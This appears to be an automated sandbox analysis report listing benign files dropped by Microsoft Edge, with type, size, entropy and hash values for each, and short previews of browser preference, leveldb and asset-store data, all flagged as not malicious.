                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.3869389499003691
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:vFvRwtIZ9II74O9WjFxFnqxb7PJTyq0KT7xqg/L0vR5YtcuJg1HF:NRwyR74lfFnqxYSqcaYt3JaH
                                                                                                                                                                                                                  MD5:D2BDAB807273A78622AA5E19AAFE6C18
                                                                                                                                                                                                                  SHA1:DC0C705244EFC3CE47AC114B0A6DF5589973A07B
                                                                                                                                                                                                                  SHA-256:72D24A76CB334C0B8AD6922FD551D31DFCC3BA70D81D2ECDD8A7B8D5C7CA8829
                                                                                                                                                                                                                  SHA-512:B07E33793076D390B4F2520D53B8BCA2A220418689E75BC67A3BF7970EC01F8A6E30C28F014700AC359B419BDAC8D4936295896F0F57A33393AF3F4CF8D92535
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                  Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                  MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                  SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                  SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                  SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40504
                                                                                                                                                                                                                  Entropy (8bit):5.561285576354764
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W209TQWSi7pLGLhR/W5wA2f4JH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0ZEbIvs/:WNFQx6chR/WaA2fOHu1jalZEugTgF6K6
                                                                                                                                                                                                                  MD5:4600FBD9544C4A01E65BA9714EB3ADBC
                                                                                                                                                                                                                  SHA1:0EE8A6A4A52CEF66FCDF41858F06C591DBF18BD9
                                                                                                                                                                                                                  SHA-256:96C86631E6247DE642F849A914969506CB16888DB45093D917CEE96112ACDCF2
                                                                                                                                                                                                                  SHA-512:D70D66F20F417368FDF3409B1B5C1244C11300AC3AE04386F9B9DFD08653918548BF681B4F12154D239F43FD9BEEBC8D7CC8A225024C151554801C85EAAF3F3A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                  Entropy (8bit):5.566063713502838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W2d9RQWG/W5wA2f4QH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPDbIvsG2rwXe+p0tW:WYzQx/WaA2fFHu1jaaubTO1tW
                                                                                                                                                                                                                  MD5:211A36A5AEB953DB50145EAD4B20FC0F
                                                                                                                                                                                                                  SHA1:11FE33220D8427EFBB7E31E0E401EA667779B745
                                                                                                                                                                                                                  SHA-256:55FB866713106BCB1BF1038C52D279F8D399FA42E92A6EB68439AE434455F605
                                                                                                                                                                                                                  SHA-512:AB90FE82D199CA97E7BD910F554DA374EE24DCE5CD8327D3535248EE3A43514989040BF46D0FDC962D7470E800246A0816E985A732B47C7B8854B5082AA3C7DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12933
                                                                                                                                                                                                                  Entropy (8bit):5.270997645997849
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAj03/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiw03w
                                                                                                                                                                                                                  MD5:435C7DA94A203A70EB7E489AE825D849
                                                                                                                                                                                                                  SHA1:909BB7EF266BD57DC267B7CF986862E83624309E
                                                                                                                                                                                                                  SHA-256:535700112F6A2EDF807B70667161F2A725E12B724E20A975B23B50949DA76872
                                                                                                                                                                                                                  SHA-512:547B05A72700931164D98EA399411A5ED13A3897A112F5CAADDA27189B74617BFFFCECAAD76AE878BFC470335D186C53406362ED3AB21D29B1F4D3BCEB752A89
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):313
                                                                                                                                                                                                                  Entropy (8bit):5.230527603691635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ/zAxq1N723oH+Tcwtp3hBtB2KLlpPQrWUN+q2PN723oH+Tcwtp3hBWsIFUv:7obAcaYebp3dFLTouvVaYebp3eFUv
                                                                                                                                                                                                                  MD5:665984B7B70E165306672C9B6204E1E1
                                                                                                                                                                                                                  SHA1:CD04A794D776EB1BE4775BF12692BF1E7871C3EB
                                                                                                                                                                                                                  SHA-256:CB707AB1FFE39F434875A3C43CE49D6EAFAEAC90B364C86B17DC24B7B59A3D88
                                                                                                                                                                                                                  SHA-512:FF0C2FC4A539394DBDE4368FD2C3375A520A84807FCA418018834530CBF24529497207C1959D403775910FF65E094FA16FB05CDB87815E4C6649BCC390F3C2E2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.285 1e18 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/18-15:06:15.313 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                  Entropy (8bit):5.222882498107223
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:IbPMZpVGfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVGfx2mjF
                                                                                                                                                                                                                  MD5:925022556E0FBA06FF6FB27DF4137321
                                                                                                                                                                                                                  SHA1:6D4CCB33B1E290E12278DFCCD18B10807546DB71
                                                                                                                                                                                                                  SHA-256:001133D0BE388ABEFCEC4FE90B91D7F446EEDBC45E73C4EB4469C2155E260C09
                                                                                                                                                                                                                  SHA-512:22359AED104A881F7B32C0F20D81DF1CABA06148D5E83AE21934B138BB6964DAA80B0EC238BE36228754E5365E75C4C7197C7B64B308B511774689788A11E800
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.142479411253435
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQt/q2PN723oH+Tcwt9Eh1tIFUt8OPQtQcFZZmw+OPQhvzkwON723oH+Tcwt9Er:7ot/vVaYeb9Eh16FUt8OotJFZ/+Ooh7W
                                                                                                                                                                                                                  MD5:D1EC57FDF29710F5A7D46D236069C981
                                                                                                                                                                                                                  SHA1:7FE9C574082EBDEF7FEF32EECD5DBA4D2ACAAF58
                                                                                                                                                                                                                  SHA-256:A1172434F0B35DDCCA0A263DF1386C062B42BA46FBB754DCC26F4DAA7186DEBD
                                                                                                                                                                                                                  SHA-512:43323AA2BC2E9C2864B265023A4ECC11102856EA2AA1EC7492BADA37EAD83AAB39CEAAEFED7E758ADC8927DC54BD367E70AD8CDE0F68931331D5B274582F0177
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.374 2160 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-15:06:15.375 2160 Recovering log #3.2024/12/18-15:06:15.380 2160 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                  Entropy (8bit):5.164045846505956
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQc4q2PN723oH+TcwtnG2tMsIFUt8OPQPJZmw+OPQPDkwON723oH+TcwtnG2tM2:7oLvVaYebn9GFUt8OoB/+Oob5OaYebnB
                                                                                                                                                                                                                  MD5:05603FD52AB671BCA9E3F149F0A6DF8E
                                                                                                                                                                                                                  SHA1:99036961E875271A9EA48DB9E02602F9CBDA9706
                                                                                                                                                                                                                  SHA-256:5D6E2BCB4A16D4B9FBBB6F33A2BC3A99EE2028B8CFB24A950F7196801D6B0ACF
                                                                                                                                                                                                                  SHA-512:D08647C02D2353678C6F669D17EDFF84599E46836C5C7DD9F29FEB86E2A13BF444ACEF8485D89794E9197BD45393ED1865D5A7ADBD04E33EBD15F6E51835E1ED
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.520 1e40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-15:06:08.521 1e40 Recovering log #3.2024/12/18-15:06:08.521 1e40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.6131735641304505
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jfVKyDp4VKrmL:TO8D4jJ/6Up+jX2H
                                                                                                                                                                                                                  MD5:184E3F276A0B6105776C0A35265F0D12
                                                                                                                                                                                                                  SHA1:51B978454F70CB15A4E9D7E75BD639E3827BD778
                                                                                                                                                                                                                  SHA-256:4272902EAA56E9842B301FADD5EA47DD557E0E30C8BFB2EDFE7FFE5D3683DDF4
                                                                                                                                                                                                                  SHA-512:849199725B70BE7C5D8ED324D19D2DB5E5331CBBA13A019E83D7A1E36B46C8D2AE18936B69C4A8A7775C33F70B0080BCFA1BECC382709F875B468155537F990F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                  Entropy (8bit):5.354136752132561
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:SA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:SFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                  MD5:01A5A341D0E7C22F3369653C0199A923
                                                                                                                                                                                                                  SHA1:F731ABBB1B7EF0B5C41AC161FE5C59D95BCB6661
                                                                                                                                                                                                                  SHA-256:EA6038BCBF52CC6E9DFF94B8CF9756B0D570F80258BBF3B6533D0EB60E5F3BD4
                                                                                                                                                                                                                  SHA-512:CE9883BA5F183B78675E090FA0ED335064B88D33F10C2CD3EDAA8CF2844DEC58A5D33ACDBE08C531F7985A4EFF1D5B95714F405A724F44660D8D374C4645253D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.11@.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379025979565098..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
